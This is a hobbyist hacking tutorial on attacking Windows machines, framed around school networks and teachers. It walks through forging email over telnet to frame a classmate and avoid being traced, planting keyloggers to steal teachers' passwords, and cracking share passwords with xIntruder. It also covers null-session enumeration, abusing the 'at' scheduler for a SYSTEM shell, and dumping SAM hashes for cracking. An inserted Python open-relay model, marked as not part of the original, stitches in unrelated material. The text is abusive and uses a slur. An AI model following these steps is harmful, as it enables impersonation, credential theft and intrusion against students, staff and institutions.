Training session 12: Windows Hacking
Learn how pathetic Microsoft security really is
What is the use of hacking a winblows box? Nothing important is ever kept on them; web servers with decent information rarely run Windows, preferring the stability, security and cost effectiveness of the superior Linux or BSD. Windows users are normally just average people with nothing more than a modem, a few bought games and a Hotmail account. Script kiddies seem to think that hacking the computer of that hot girl down the street will provide some mystical insight into what she wants in a guy, or maybe even, in some unknown way, get them laid. This is totally wrong: very rarely do girls keep their diary on their computer, very rarely does their Hotmail account contain more than a few emails from relatives, and extremely rarely does it get you anything useful.
So I ask again, now that you have been somewhat enlightened: what is the use of hacking a winblows box? Nearly every decent hacker out there can recall the days when they were in school, not knowing, or not having access to, anything but Windows (and, if they were lucky, OS/2), and out of boredom took to hacking the school network. Hacking Windows boxes gives a basic insight into what security is and the basic methods of defeating it: setting up keyloggers and sniffers, playing pranks on teachers, and maybe even stealing a few internet accounts along the way.
Anyway, now that I have hopefully enlightened you a little as to how useless hacking Windows boxes really is, the one thing they are good for is learning to hack: the sheer number of people who run Windows, and the carelessness of those people, give you a very large number of possible targets.
First thing: people who run Windows by choice are stupid. Those who dual boot between Linux and winblows can be excused, but for the vast majority of society this is true. So what if these people are stupid? Why does this help us hack their pathetic box? To put it simply, they can be social engineered with little or no effort. This means, for example, that we could trick a teacher into giving us the school administrator password, and with it a higher grade.
A simple act of faking an email, with an attachment containing a custom-coded trojan that enables sharing of a particular drive, and the target is gone. Faking email is very simple: a mail server of this kind accepts whatever sender address you give it, so all it takes is a bit of creativity and a few minutes of time. The following is an example session that would get that idiot from maths class back for pissing you off (you type the lines after the telnet prompt; the server answers each one with a 2xx or 3xx code):
telnet mail.school.com 25
helo school.com
mail from: firstname.lastname@example.org
rcpt to: email@example.com
data
You are a lying piece of retarded crap, you dickhead of a principal!
.
quit
OK, mail.school.com obviously has to be replaced with your school's mail server address, firstname.lastname@example.org with the address of the student you want payback on (the forged sender), and email@example.com with the principal's address. The whole trick is that the server never checks the address on the 'mail from' line against who is actually connected. The one thing you do not control is the Received: header the server stamps on the message with the IP of the machine you typed this from, which is exactly what an annoyed sysadmin reads first, so do not do it from your own account. Although this accomplishes nothing but getting the student suspended for a week or so, it shows how simple it would be to trick our target into believing a malicious program we crafted was sent by the target's beloved grandma.
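The session above in miniature, as an added example that is not from the original page: a small Python model of a mail server that, like the one described, accepts any 'mail from' without authentication, a client that drives it with a forged sender, and the check an administrator runs afterwards. The relay name, the addresses and the 10.0.0.42 client IP are constructed placeholders.

```python
"""Toy model of the forgery in the telnet session: an SMTP server that takes
MAIL FROM on faith. Added example, not code from the original page. Host
names, addresses and the 10.0.0.42 client IP are constructed placeholders."""


class OpenRelay:
    """In-memory SMTP server state machine with no authentication and no
    check that the envelope sender belongs to the connecting client."""

    def __init__(self, hostname, peer_ip):
        self.hostname = hostname
        self.peer_ip = peer_ip          # real source address of the TCP connection
        self.helo = "unknown"
        self.mail_from = None
        self.rcpt_to = []
        self.body = None                # list of lines while inside DATA, else None
        self.delivered = []             # messages accepted for delivery

    def handle(self, line):
        """Feed one client line; return the server reply (None while collecting DATA)."""
        if self.body is not None:
            if line != ".":
                self.body.append(line)
                return None
            # The relay stamps the connecting IP on the message: the one fact
            # the forger did not get to choose, and what an admin looks at.
            received = f"Received: from {self.helo} ({self.peer_ip}) by {self.hostname}"
            self.delivered.append({
                "envelope_from": self.mail_from,
                "envelope_to": list(self.rcpt_to),
                "message": "\n".join([received] + self.body),
            })
            self.mail_from, self.rcpt_to, self.body = None, [], None
            return "250 OK: queued"
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb in ("HELO", "EHLO"):
            self.helo = arg.strip() or "unknown"
            return f"250 {self.hostname}"
        if verb in ("MAIL", "RCPT"):
            if ":" not in arg:
                return "501 Syntax error"
            address = arg.split(":", 1)[1].strip().strip("<>")
            if verb == "MAIL":          # "MAIL FROM:<anyone>" is accepted as stated
                self.mail_from = address
                return "250 OK"
            if self.mail_from is None:
                return "503 Error: need MAIL command"
            self.rcpt_to.append(address)
            return "250 OK"
        if verb == "DATA":
            if not self.rcpt_to:
                return "503 Error: need RCPT command"
            self.body = []
            return "354 End data with <CR><LF>.<CR><LF>"
        if verb == "QUIT":
            return "221 Bye"
        return "500 Error: command not recognized"


def forge_mail(relay, fake_sender, recipient, subject, text):
    """Drive the relay the way the telnet session does, with a forged sender.
    Returns the reply to the final '.' and the full command/reply transcript."""
    transcript = []

    def send(line):
        reply = relay.handle(line)
        transcript.append((line, reply))
        return reply

    send("HELO attacker-pc")                     # constructed host name
    send(f"MAIL FROM:<{fake_sender}>")           # nothing proves this is us
    send(f"RCPT TO:<{recipient}>")
    send("DATA")
    for line in (f"From: {fake_sender}", f"To: {recipient}", f"Subject: {subject}", "", text):
        send(line)
    status = send(".")
    send("QUIT")
    return status, transcript


def origin_of(message):
    """What the investigating admin does: read the connecting IP back out of
    the relay's Received: header instead of trusting From:."""
    for line in message.splitlines():
        if line.startswith("Received:") and "(" in line:
            return line.split("(", 1)[1].split(")", 1)[0]
    return None


if __name__ == "__main__":
    relay = OpenRelay("mail.school.com", "10.0.0.42")
    status, transcript = forge_mail(relay, "firstname.lastname@example.org",
                                    "email@example.com", "re: my grade",
                                    "You are a lying piece of crap!")
    for sent, reply in transcript:
        print(f"C: {sent}" + (f"\nS: {reply}" if reply else ""))
    msg = relay.delivered[0]
    print("envelope sender the relay believed:", msg["envelope_from"])
    print("but the connection really came from:", origin_of(msg["message"]))
```

The transcript printed by the main block is the same command sequence as the telnet session. The point of origin_of() is that both the From: line and the envelope sender are whatever the forger typed, while the Received: line records where the connection actually came from.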
Keyloggers come in handy in many cases: they simply record every key that is pressed, the teacher types his or her password, it is saved to a file, and you come back and pick up the bounty. Annoyingly this is a lot harder on NT or 2000, where an ordinary account cannot install drivers or write to the system directories, and anything you start under your own account dies when you log off, so other approaches have to be taken.
Many 95/98/ME users have file and print sharing active, and a mere share password is all that stands between you and a nicely placed trojan on the target's computer. To check whether the target has file and print sharing active, open Explorer and type \\ip.of.target into the address bar, where 'ip.of.target' is obviously the target's IP. If you don't receive an error, the victim is as careless as we first believed. If none of the shares have passwords we are lucky; if they do, all that is required is xIntruder, which exploits a bug in the 9x share-level password check (the server compares only as many characters as the client sends, so the password can be guessed one byte at a time; Microsoft patched it in MS00-072) and recovers any share password within a few minutes. If the target has NT, 2000 or XP you are out of luck: those authenticate per user with a challenge/response, so you have to guess whole passwords, and that takes ages in most cases. Some useful information can still be obtained from these boxes through NetBIOS. To find out what shares are active, type the following at the DOS prompt (the first line opens a 'null session', an anonymous connection to the IPC$ share):
net use \\ip.of.target\ipc$ "" /user:""
net view \\ip.of.target
In most cases this shows you the full list of shares apart from the hidden ones (names ending in $ are not listed by net view). NT/2000/XP also create default administrative shares, IPC$ plus one per drive letter, for example C$ for the C: drive, but only users with administrator privileges may connect to those. Depending on the lameness of the administrator you may even find shares the Everyone group has full access to. Be aware that on NT4 (SP3 and later) and 2000 a competent administrator sets the RestrictAnonymous registry value, after which a null session cannot enumerate shares or users at all.
Let's introduce a nice little hole in NT called 'at'. The at command hands jobs to the Schedule service, which runs them as the LocalSystem account, 'SYSTEM', which has rights even administrators lack by default (reading the SAM hive in the registry, for one). By default only administrators may submit jobs, so if an ordinary account can use it your system administrator is about as intelligent as two tin cans and a rubber band. To test for it, go into DOS and type 'at': if you get 'Access is denied' you are out of luck, but if you get a job list (or 'There are no entries in the list') you can now run anything as SYSTEM. Schedule cmd.exe with the /interactive switch a minute or two ahead and a SYSTEM shell pops up on your desktop; from it run regedt32 and change registry permissions, or basically do anything you wish. This is only the local box, and it hasn't got you the administrator password. To get that use samdump, pwdump or something similar to take a copy of the SAM, which holds the LM and NT password hashes of every local account. While Windows is running the SAM file itself is locked, and the SAM hive in the registry is readable only by SYSTEM, not by administrators, which is exactly why the at trick matters. Take the hashes home and crack them with our good friend John the Ripper or with L0phtCrack.
These are just some basic ideas on how to hack a winblows box. There are many more methods, far too many to list them all, but hopefully this list encourages some creativity and inspires you to do some research. Windows really isn't as secure as Microsoft wishes us to believe.